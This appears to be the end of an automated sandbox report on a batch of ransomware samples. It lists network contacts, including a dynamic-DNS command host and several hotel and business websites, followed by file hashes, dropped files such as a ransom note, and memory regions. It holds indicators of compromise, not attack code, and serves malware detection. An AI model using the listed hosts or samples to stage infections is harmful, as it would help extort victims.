US 8.8.8.8:53 22.249.75.77.in-addr.arpa udp
DE 77.75.249.22:443 www.2mmotorsport.biz tcp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.18.190.80:80 r10.o.lencr.org tcp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 www.haargenau.biz udp
CH 217.26.53.161:80 www.haargenau.biz tcp
CH 217.26.53.161:80 www.haargenau.biz tcp
US 8.8.8.8:53 www.bizziniinfissi.com udp
US 8.8.8.8:53 161.53.26.217.in-addr.arpa udp
US 8.8.8.8:53 www.holzbock.biz udp
CH 94.126.20.68:80 www.holzbock.biz tcp
CH 94.126.20.68:443 www.holzbock.biz tcp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 68.20.126.94.in-addr.arpa udp
US 8.8.8.8:53 www.schreiner-freiamt.ch udp
CH 94.126.20.68:443 www.schreiner-freiamt.ch tcp
US 8.8.8.8:53 www.fliptray.biz udp
US 8.8.8.8:53 www.pizcam.com udp
CH 185.177.62.27:80 www.pizcam.com tcp
CH 185.177.62.27:443 www.pizcam.com tcp
US 8.8.8.8:53 27.62.177.185.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.18.190.73:80 r11.o.lencr.org tcp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 www.swisswellness.com udp
DE 83.138.86.12:80 www.swisswellness.com tcp
DE 83.138.86.12:80 www.swisswellness.com tcp
US 8.8.8.8:53 www.hotelweisshorn.com udp
US 8.8.8.8:53 afmrx.ddns.net udp
HK 38.207.226.122:80 www.hotelweisshorn.com tcp
US 198.12.124.71:443 tcp
US 8.8.8.8:53 122.226.207.38.in-addr.arpa udp
DE 193.23.244.244:80 193.23.244.244 tcp
HK 38.207.226.122:80 www.hotelweisshorn.com tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 8.8.8.8:53 71.124.12.198.in-addr.arpa udp
US 8.8.8.8:53 www.whitepod.com udp
CH 83.166.138.7:80 www.whitepod.com tcp
CH 83.166.138.7:443 www.whitepod.com tcp
US 8.8.8.8:53 7.138.166.83.in-addr.arpa udp
US 8.8.8.8:53 www.hardrockhoteldavos.com udp
US 18.207.88.16:80 www.hardrockhoteldavos.com tcp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 16.88.207.18.in-addr.arpa udp
US 18.207.88.16:443 www.hardrockhoteldavos.com tcp
US 8.8.8.8:53 www.hardrockhotels.com udp
US 151.101.131.52:443 www.hardrockhotels.com tcp
US 8.8.8.8:53 crl.starfieldtech.com udp
US 192.124.249.41:80 crl.starfieldtech.com tcp
US 8.8.8.8:53 52.131.101.151.in-addr.arpa udp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 hotel.hardrock.com udp
US 151.101.67.52:443 hotel.hardrock.com tcp
US 8.8.8.8:53 52.67.101.151.in-addr.arpa udp
US 8.8.8.8:53 www.belvedere-locarno.com udp
US 172.67.68.116:80 www.belvedere-locarno.com tcp
US 172.67.68.116:443 www.belvedere-locarno.com tcp
US 8.8.8.8:53 116.68.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.hotelfarinet.com udp
GB 18.132.18.63:80 www.hotelfarinet.com tcp
US 8.8.8.8:53 afmrx.ddns.net udp
GB 18.132.18.63:443 www.hotelfarinet.com tcp
US 8.8.8.8:53 63.18.132.18.in-addr.arpa udp
US 8.8.8.8:53 www.hrk-ramoz.com udp
HK 156.235.147.122:80 www.hrk-ramoz.com tcp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 afmrx.ddns.net udp
HK 156.235.147.122:80 www.hrk-ramoz.com tcp
US 8.8.8.8:53 afmrx.ddns.net udp

Files

C:\Users\Admin\AppData\Local\Temp\7zEC4EC2897\00484\Trojan-Ransom.Win32.Blocker.nmtj-b6740f24c14c7ade82150dfcbe8ede8975490766ba66b19d1ccaf7e98453519f.exe

MD5 84eb1d76ff7ca29803ef1e2e7ec4b934
SHA1 aac242f8fa3f580f04d963af20ba98e082d72cd6
SHA256 b6740f24c14c7ade82150dfcbe8ede8975490766ba66b19d1ccaf7e98453519f
SHA512 18c004a9f0295793a66f33143c6bb5f714bfb77aef47ec6d3da46442d258d13de27e215ba39e36aec17c9a8b8864909835c7481567df658af166a28301c51050

memory/3124-236-0x000001E77D320000-0x000001E77D342000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nlbiq3m3.vrn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3124-244-0x000001E77F890000-0x000001E77F8D4000-memory.dmp

memory/3124-245-0x000001E77F960000-0x000001E77F9D6000-memory.dmp

memory/2884-248-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-250-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-249-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-254-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-260-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-259-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-258-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-257-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-256-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

memory/2884-255-0x000001E0223F0000-0x000001E0223F1000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 6bd369f7c74a28194c991ed1404da30f
SHA1 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA512 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 d2fb266b97caff2086bf0fa74eddb6b2
SHA1 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256 b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512 c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a.exe

MD5 c24eac6df4f90455311845592000c1b3
SHA1 bf6c30e5231ea078700040fda46996e1b9ab9897
SHA256 9c03d92ab53c3001c366424540352be8192e2b394fb086407fec1c5171092c2a
SHA512 0ff2f47324633d38b28ac168cd8e4eea592a8425e1bb45577d5aeef536025020e8b92e9e300efd7b9851c31d2746b634293530ebd10535aeca412e44cecc799a

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3.exe

MD5 271f7b27aa5a425e6968596820f5dad7
SHA1 936eeaeb3a6637e747d03e9ee45a8f8f40283b03
SHA256 c11675751bb311049da57745dbae337eafd48db2ca17c4195de23ff9eb40c5b3
SHA512 01f40b5ab899b1ccd7cd7e3365ad1efe91040169ef418e52e27654add7281431ab944145df6753bb74306574b843c637edba85021497738dadc8d5023002ff8c

memory/3436-283-0x000000001B9B0000-0x000000001BA56000-memory.dmp

memory/2016-282-0x0000028778660000-0x00000287787C8000-memory.dmp

memory/3188-287-0x0000000000E00000-0x0000000001002000-memory.dmp

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11.exe

MD5 6811baeb6b49e13e34f04eed3bcfc63c
SHA1 59f28ee1ea1473778c1de80de15d88fb80086618
SHA256 b3ce84f48b34e821f18bfc828eb8da378d2531f7cc2bb16db82e11bead446b11
SHA512 eb5cb101a2729e424492db05974db81729dbbb7c745b5deed81342743eb1bc6e69b1c9b198722cb038fd6c21753fe75dfdfbcb51be5b1ed80980f83dd24a3bcf

memory/3436-288-0x000000001BF30000-0x000000001C3FE000-memory.dmp

memory/3436-289-0x000000001C4A0000-0x000000001C53C000-memory.dmp

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Agent.gen-e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd.exe

MD5 4b2d4905487bbf6beb11de24a3e5474e
SHA1 25bb7d42c43f840cc1a83789f6a75259a574243a
SHA256 e50180a261801969db2574932e8deeac87a1efba53e50dbc1fc24a653a6b74bd
SHA512 f86629f5929afa935b70bd1d0dcaa3d12a99ed98e2ce3b9bbe1d0417d24989a508a2c7dffade5977454337d0be6595bbb02f9524e84dd9e040122c9fd1b4e287

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff.exe

MD5 141bab824eba23b0c6603a8f8e86965c
SHA1 e9a9ff36cb24fd8253c69bd5f3d52ff59acc7b20
SHA256 fbf8b45d1697677f1f3e080552bfc66e9db36d03f28b22cf7156f0cb156e71ff
SHA512 2c1684ac88a7d1e62193bdf66069d4ef0d3af5a9485037b4696b889b561de5cc60cf1c665c6d7c09238f9b0438aff53a35f1e423b02217e2ea91bed5d83f9150

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e.exe

MD5 1a9b4d1fee57263deb9d3afc8ecb5900
SHA1 997fab31fdbe76484647ee17ab54565ab8079cb6
SHA256 5b7bed7349f6b1499b7eac111d7264101b13eeb9684830a4a93bab5f9d79d77e
SHA512 d8ab2620451a3d4d679ccae7c90d1da2733b15b2942df4774f7061f8c0a981c0bef6c4fdc74b7100941f04f55ad1aec7fd50a0fd745f40bcd1fc8a5d0eb4e63c

memory/2016-307-0x000002877AC10000-0x000002877AD10000-memory.dmp

C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-bc611e74a270c91ba66c308aaa8f4b839e7982c64ca6132e923febc6f468be31.zip

MD5 8f5657564e53fa8c94c3891fe25f7e03
SHA1 e8efbdffb98b2941995001440f179cf58ada558f
SHA256 82857669ce13a5694acc919b41f8b4e251970042bc1975e67768dae19bfb3a2a
SHA512 f609da56138d569efcef85c90a6891828d94c238243d6cde85940cbc1ff03974b17ac7f2e1be75d7e77783fd0d6e33a8431d64ba73cde4f03aab8bc88c39b28c

C:\GET_YOUR_FILES_BACK.txt

MD5 56d4bd7f10cb90aad3515b1ad6f6a18e
SHA1 74c6f4a6e24982584f494ad704896585ae6b3df6
SHA256 d3ae28884579358a4a420d503ec0b53b2d208c1421fc74294480fa409e5d0fc9
SHA512 98b10c847f42c533d1ac24c8c05d7ab6d055bd608b5a52d032cbd0304cecab1f8f2e0bdaed7db7313f8de2f820f24a749debe13b512e25a91cb879e4b686848c

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Cryptor.pef-553e833cf333ad707a9aa18e01f6d9d4fca8935b92f15c5ddfee379eabcb9efa.exe

MD5 dd6d5b77ea31de026c8bfb867f14ed70
SHA1 7865af12c34f87e095ff70812eb753cf3f944449
SHA256 553e833cf333ad707a9aa18e01f6d9d4fca8935b92f15c5ddfee379eabcb9efa
SHA512 45f361bd370f83d07de54f21ea1beacca8fe98e12a1051f37dc8e690481675d838620d3a2cca107007981b30795afe2240de0ffff58dc3265d8e259c0fe6b220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

memory/6916-760-0x0000000004FB0000-0x00000000055D8000-memory.dmp

memory/6916-759-0x0000000004820000-0x0000000004856000-memory.dmp

memory/6916-761-0x0000000004E30000-0x0000000004E52000-memory.dmp

memory/6916-763-0x00000000056D0000-0x0000000005736000-memory.dmp

memory/6916-762-0x0000000004ED0000-0x0000000004F36000-memory.dmp

memory/6916-765-0x0000000005840000-0x0000000005B94000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/6916-782-0x0000000005DE0000-0x0000000005DFE000-memory.dmp

memory/6916-783-0x0000000005E10000-0x0000000005E5C000-memory.dmp

C:\Users\Admin\Desktop\00484\uninstall.bat

MD5 f1dba491b15addc4eb898efb7e10473b
SHA1 bfd44bf1fe023d9329853217fb0afa5c22fc3838
SHA256 96cb7a5a15a2ddb9c466a09c22fb0968488cc7be0f12642081279130bf0723eb
SHA512 7776dae27c2caba71f0f8d7a1b0cef712fa08b0895ecb7bc14c51446024b487eaabe3455f5c80cc637e3d8e4e3b3ba03fb67b6e0f1e385d7fe3d5fd3b86bfc64

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5cfe303e798d1cc6c1dab341e7265c15
SHA1 cd2834e05191a24e28a100f3f8114d5a7708dc7c
SHA256 c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab
SHA512 ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

memory/6916-807-0x0000000007520000-0x0000000007B9A000-memory.dmp

memory/6916-808-0x0000000006ED0000-0x0000000006EEA000-memory.dmp

memory/6916-809-0x0000000007230000-0x00000000072C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eed04aef1916ea29c10c30f3a00bd13a
SHA1 41f30b01a2b2e03808ce8d549ed27c0cc3c7da3e
SHA256 5db4ba21e575ee1d1b178dc1cf51e14465fd1938f2e25658164ba11f73f6d814
SHA512 32927e504bb6770bc03e05ba59061b061c67116c9f66ae83e8941d1ac95f548169016d9ef9ef560074e2ea5afb8fe0c2c96e3b50e912b073f14275789992aaed

C:\Users\Admin\AppData\Local\Temp\svchost32.exe

MD5 720cccbdfe6ac0cc90c0080c9a4b44da
SHA1 ed4466c3a1775d093f0eb039425deab083ad5e03
SHA256 20d178389ead76d038b79b1dc43db7a8b0db3eac8ba7da16163eadc3ee7fb2d0
SHA512 25f82fe138fe960abee588967cfe8fc4b6cc9371ef9f8d821f147efd0d8ea3147c4b44589068e4b057c6701f54e93abe903849d247f5cbfbda072fb1736fd066

memory/5672-832-0x0000000001900000-0x0000000001912000-memory.dmp

memory/5672-831-0x0000000000E50000-0x000000000103A000-memory.dmp

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Encoder.gen-35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31.exe

MD5 c9ee6fd53cfc687efc56a6beea900eba
SHA1 cf7fdc95de5b7baf41bf94e80c5f7f98fb66fab6
SHA256 35a3be045e57f3a0abdbae99984760eef0c3713189deabae330f501178f48e31
SHA512 24a544fcdac07936e70e1034c901b74c63f7effe4fb4370a52a87b950a8a25115d4047475495ef7dca420e935e22f6418816b5f20cd6c9592a5f9ad94c37e9e3

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

MD5 cd2fb1d044d414dcbf32bf67f2563208
SHA1 98dae9d51bc1ee7d619a546550adc2e98113db17
SHA256 f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589
SHA512 88a89c729f4edf3cb944de03bed2177cb9b2791de261bbdb15ebeceb075311ba9318abedfa8380a194062b048496f43c9a5bbfdf712f96a69aa4b5d80c1adbde

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7.exe

MD5 56eaefbcc16d24a34c69df6d2c00583a
SHA1 819afe029b24a947c918573bd9dedcc4f0ddd920
SHA256 3c0360acd0ce74cb44b8fb9bd2c8fcfac81a980ae108b2477d5fbdc17786cbc7
SHA512 a457dc2f756f980b47785b26c9bbd696bf6fd2dbea28b0c840288f08ade52e61e5c623b3f69c3aceee12b3716cac985472554f25e5d0c48a57de539f447fd528

memory/6556-849-0x000002290D500000-0x000002290D53C000-memory.dmp

memory/5864-845-0x00000000024A0000-0x00000000024B7000-memory.dmp

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Generic-e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a.exe

MD5 5532b27d8fc70d5e9bb368875f6e1ac4
SHA1 61564eca653e4ea88a7f2ec04aa00951a949eeae
SHA256 e7974f558f498367cb1209f37181411662e83f5f522d8e7b48297361bf29506a
SHA512 26430a5a63ea594413402b136dbb8808936cbfc09ed73a0c376293862b41a79947332b5f1807979f93619915d3b2ad17ae8f60ac05b1c0559c03f8e7144984b8

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb.exe

MD5 7ab30a6f0c29959f88dfba04323402bf
SHA1 c74f3beb32cc12c4fa3c6bcf1fbead032a5e90ce
SHA256 ef8045de414c6a1ebbdc6ba03f14e832be975d14e6295d1c0c884768e8f53cdb
SHA512 c59e96a3a8669af3c3b1dc2c11f13a570581761b5932c123ab3f9ea668c7676e105afa27a231314487e53d3ea50649ce1838de25a73f6b4479ddad53828ed9a6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 003b6c33e9d7dbd172ff79002b1c36ab
SHA1 459c61dd8a6e79b2e1e89f83533ab6da736fe233
SHA256 c0f322f6ae1db9f3c84e1a91c5b53995fea1ea62120bcb7bf044e70e8960cbca
SHA512 2a3f9a2d47460f5bbf6ea86be5f7ca6be75cfd810de928f23345cae62480879a28c5ed55a08f864434806af6bc156040cc8b22df3500efa652fda567d48cf7c9

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80.exe

MD5 f82266c8495681c23392aa04aa08aa05
SHA1 9ce8053a997a3a4af9500e1e4319b88c82a95a71
SHA256 5e6b3680047317ceea85b42cdf508204319b55fe183e42e86847efbd09f5ca80
SHA512 26caf3b6b77c7bc393211fb1fa2ccc254cea4de7898e1f4616c4ed583989c2064eef11251efc15119a31570234c112d4d23a81de12432601774fd6902ead642a

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe

MD5 9ebd5a3485f55d38b8aba3aed012a216
SHA1 061b08575b2cc8a7a6bb49f818d47b2d4e367db6
SHA256 c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c
SHA512 09958d6fdb16170efbc15121336a28692b1091865ebbe4c427c937923ce442c3afdcc3995e4f78c37e211e317b53d7a42dd62ed66d6b49bdf1ac1826a4eebb44

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe

MD5 d10a55d699a1a6da304855d30394e0da
SHA1 fb0946a5690978445fba09e44f7bfee4c526c85d
SHA256 c35450e955cedca2ecdc8b5b010faabf5bfdd93ff12fedf9186cedb83bc7cbd4
SHA512 290b74d3e47a653b1a20a2597aeaa30a76039e5977c2449f37f54810d83871adb3647af6024dfdd698744246b233670aec9931ad8e2d5565c8df1ca86706582f

C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-3d488dc7b6df72e08d341b66a2d872880e64c97dcb64938733328047b78b556a.exe

MD5 e2b024b1f0951b48889862733bf200f8
SHA1 15f12fb4c0e3c72470a10fdb4e69cd419952b12d
SHA256 3d488dc7b6df72e08d341b66a2d872880e64c97dcb64938733328047b78b556a
SHA512 2152d9455e7ce51ececdc0bafad173b526ab00cdcb76d696d62d4c61df55635816d5c4f49074ea78c7bdc7bb5ccecda11bb9cb6b83ffc2f95eabbc5a2617a75f

memory/1084-894-0x0000000005980000-0x0000000005CD4000-memory.dmp

memory/5496-1053-0x0000000000D40000-0x0000000000D8C000-memory.dmp

memory/5496-1110-0x0000000002E20000-0x0000000002E26000-memory.dmp

memory/5496-1109-0x0000000002DC0000-0x0000000002E12000-memory.dmp

memory/5496-1080-0x0000000002DA0000-0x0000000002DA6000-memory.dmp

F:\AUTORUN.INF

MD5 ca13857b2fd3895a39f09d9dde3cca97
SHA1 8b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0
SHA256 cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae
SHA512 55e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47

memory/5496-1164-0x0000000007BA0000-0x0000000007C3C000-memory.dmp

memory/1744-1175-0x0000000006980000-0x00000000069CC000-memory.dmp

memory/5496-1176-0x0000000008510000-0x0000000008A3C000-memory.dmp

memory/5496-1174-0x0000000007E10000-0x0000000007FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp4CFA.tmp

MD5 3cfabadfcb05a77b204fe1a6b09a5c90
SHA1 f106b5ed22265e64bc61dc5cf1e2d33ed12ec18d
SHA256 693617c470d7472e751d872341061cfb663f22ee95bdb42f9db01f02cb90df9c
SHA512 d5502023a17213919e2e991f5ba2d0d2c08223fd489d876a47a37239b637d03ace9cb9b92deb71460ae4030194ca49ce9e9752e0bf2ccbcd297dc5afe62a4e7b

C:\Users\Admin\AppData\Local\Temp\tmp4CE5.tmp

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\tmp4CE2.tmp

MD5 76c30bd3c26bdfbd5e5611773e7c6b31
SHA1 9f9cab8d045636cf4736329dd96479adaf734714
SHA256 a810df51e154fcb9cfdae5d793d10bfa0990d527646728001aa40e5205fb6f0d
SHA512 c58060f7009fe94302fad808e2f03f99b1e7e4e1a59417dc2f71010048cf9b76722270131e9967d97c1d55258e0a29cf8f2c26b6a1311ebeb5863c1e18c1bf4b

C:\Users\Admin\AppData\Local\Temp\tmp4E9F.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/5496-1436-0x0000000005D30000-0x00000000062D4000-memory.dmp

memory/7708-1442-0x0000000000400000-0x0000000000537000-memory.dmp

memory/7708-1441-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp4F18.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmp4E9C.tmp

MD5 df6eb06ce3a81f0911806338d0911749
SHA1 bbcfb6645d7f4c315806cc33a691f5ea3dcfb353
SHA256 305cb4278b5a1a9c4ecd32366a86f777e2d4f3ef846e21814f307f181a0bf843
SHA512 a0aa7a31c2d4604f41231ce7224e239c8bc5b2d6427da70da7e0405ea4a4c30b0a503545fd1c99755af9ba09a50e5d05963ff1fab870e5747f6a7e6a9c3ef04b

C:\Users\Admin\AppData\Local\Temp\tmp4F12.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

memory/5656-1443-0x0000000000400000-0x00000000015FA000-memory.dmp

memory/2016-1447-0x000002877B660000-0x000002877B75A000-memory.dmp

memory/7964-1448-0x0000000000EA0000-0x0000000000EB6000-memory.dmp

memory/7964-1449-0x0000000002E10000-0x0000000002E16000-memory.dmp

memory/2016-1450-0x000002877B760000-0x000002877B7B8000-memory.dmp

memory/4228-1452-0x0000000000400000-0x000000000043C000-memory.dmp

memory/1020-1475-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/1084-1465-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/2016-1451-0x000002877D3D0000-0x000002877D89C000-memory.dmp

memory/760-1455-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/760-1454-0x0000000006AF0000-0x0000000006B22000-memory.dmp

memory/3300-1496-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/760-1485-0x0000000006A40000-0x0000000006A5E000-memory.dmp

memory/1744-1486-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/760-1507-0x00000000074F0000-0x0000000007593000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fake.exe

MD5 99be0081373a323ad3ec1ddcd31c969d
SHA1 a4aba18f60f0b243f95ef44ea16e25809c21db59
SHA256 985341027d53e6f9403861d917a3117c7a78dd8a6e13b7cded5537d19ce0cf7a
SHA512 914ee0df7a195c8b4346adf4cedeaa499eaf61a99988b559f6d468287e41c304ca15915d095c56c373e6d099899749c2a5d4654343873ebaf4ee0323d0bdac5e

memory/7008-1526-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/6952-1555-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/4084-1624-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/2992-1603-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/3144-1591-0x0000000072FF0000-0x000000007303C000-memory.dmp

memory/1620-1614-0x0000000072FF0000-0x000000007303C000-memory.dmp

